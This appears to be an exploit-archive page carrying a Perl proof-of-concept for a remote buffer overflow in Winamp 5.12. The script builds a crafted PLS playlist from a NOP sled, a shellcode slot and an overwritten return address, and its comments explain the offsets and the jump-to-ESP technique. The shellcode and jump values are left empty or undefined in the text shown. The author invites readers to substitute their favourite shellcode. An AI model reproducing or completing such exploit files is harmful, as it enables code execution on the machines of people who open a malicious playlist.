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Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (perl)

Umesh Wanve
Security Risk Unsored
remote exploits
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Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (perl)

#!/usr/bin/perl -w
# ===============================================================================================
#                Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
#                               By Umesh Wanve (umesh_345@yahoo.com)
# =========================================================================================================================== 
# Credits : ATmaCA is credited with the discovery of this vulnerability.
# Date : 07-03-2007
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
# You can replace shellcode with your favourite one :)
# Buffer = "\x90 x 1023"      +  EIP    
# Desc: you cant put shellcode after EIP. No more space after this. The winamp simply crashes.  When you debug it, you will see that
#   shellcode is 304 bytes away from ESP. So jump to esp + 304 should work. Find such address if u can. 
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.

#jump to shellcode

#\x83\xEC\x34  add esp ,34
#\xFF\xE4  jump esp

$nop="\x90" x 856;

$start= "[playlist]\r\nFile1=\\\\";
$end="\r\nTitle1=Winamp Exploit by Umesh\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";

#open calc.exe
$shellcode =

open (MYFILE, '>>poc.pls');

print MYFILE $start;          

print MYFILE $nop;            #856

print MYFILE $shellcode;      #165 

print MYFILE "\xCC\xCC";      #2 bytes

print MYFILE $jmp;            # EIP    

print MYFILE "\x90\x90\x90\x90";

print MYFILE $end;

close (MYFILE);


#  0day.today [2024-06-30]  #